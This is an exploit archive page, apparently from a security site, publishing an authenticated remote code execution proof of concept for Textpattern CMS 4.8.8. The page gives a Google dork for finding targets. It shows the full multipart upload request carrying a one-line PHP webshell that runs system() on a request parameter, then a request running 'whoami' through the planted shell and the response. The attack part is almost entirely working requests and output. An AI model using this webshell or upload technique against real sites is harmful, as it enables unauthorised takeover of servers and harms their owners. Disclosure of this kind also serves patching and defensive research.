Textpattern 4.8.8 Remote Code Execution

Textpattern 4.8.8 Remote Code Execution: Posted Mar 31, 2023; Authored by Alperen Ergel; Textpattern version 4.8.8 suffers from an authenticated remote code execution vulnerability.; tags | exploit, remote, code execution; SHA-256 | 89d596b7562691bc5e3d1b701cec34938f03d197f1f7784c76de0061cdc011cc; Download | Favorite | View

Textpattern 4.8.8 Remote Code Execution

# Exploit Title: Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://textpattern.com/
# Version : 4.8.8
# Tested on: windows 11 xammp | Kali linux
# Category: WebApp
# Google Dork: intext:"Published with Textpattern CMS"
# Date: 10/09/2022
#
######## Description ########
#
#  Step 1: Login admin account and go settings of site
#  Step 2: Upload a file to web site and selecet the rce.php
#  Step3 : Upload your webshell that's it...
#
######## Proof of Concept ########


========>>> START REQUEST <<<=========




############# POST REQUEST (FILE UPLOAD) ############################## (1)

POST /textpattern/index.php?event=file HTTP/1.1
Host: localhost
Content-Length: 1038
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMgUEFltFdqBVvdJu
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/textpattern/index.php?event=file
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: txp_login=admin%2C94d754006b895d61d9ce16cf55165bbf; txp_login_public=4353608be0admin
Connection: close

------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="fileInputOrder"

1/1
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="app_mode"

async
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="MAX_FILE_SIZE"

2000000
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="event"

file
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="step"

file_insert
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="id"


------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="_txp_token"

16ea3b64ca6379aee9599586dae73a5d
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="thefile[]"; filename="rce.php"
Content-Type: application/octet-stream

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
------WebKitFormBoundaryMgUEFltFdqBVvdJu--


############ POST RESPONSE (FILE UPLOAD) ######### (1)

HTTP/1.1 200 OK
Date: Sat, 10 Sep 2022 15:28:57 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
X-Textpattern-Runtime: 35.38 ms
X-Textpattern-Querytime: 9.55 ms
X-Textpattern-Queries: 16
X-Textpattern-Memory: 2893 kB
Content-Length: 270
Connection: close
Content-Type: text/javascript; charset=utf-8

___________________________________________________________________________________________________________________________________________________

############ REQUEST TO THE PAYLOAD ############################### (2)

GET /files/c.php?cmd=whoami HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: txp_login_public=4353608be0admin
Connection: close


############ RESPONSE THE PAYLOAD ############################### (2)

HTTP/1.1 200 OK
Date: Sat, 10 Sep 2022 15:33:06 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
Content-Length: 29
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>alpernae\alperen
</pre>

========>>> END REQUEST <<<=========

Top Authors In Last 30 Days

Red Hat 229 files
Ubuntu 82 files
Gentoo 24 files
Debian 20 files
Google Security Research 17 files
Mirabbas Agalarov 16 files
CraCkEr 11 files
Ivan Fratric 8 files
Ahmet Umit Bayram 7 files
nu11secur1ty 7 files

File Archives

Systems

AIX (428)
Apple (1,970)
BSD (373)
CentOS (57)
Cisco (1,920)
Debian (6,748)
Fedora (1,691)
FreeBSD (1,244)
Gentoo (4,312)
HPUX (879)
iOS (342)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,734)
Mac OS X (685)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (13,304)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,605)
UNIX (9,232)
UnixWare (186)
Windows (6,555)
Other

Textpattern 4.8.8 Remote Code Execution

Textpattern 4.8.8 Remote Code Execution

File Archive:

May 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Textpattern 4.8.8 Remote Code Execution

Share This

Textpattern 4.8.8 Remote Code Execution

File Archive:

May 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems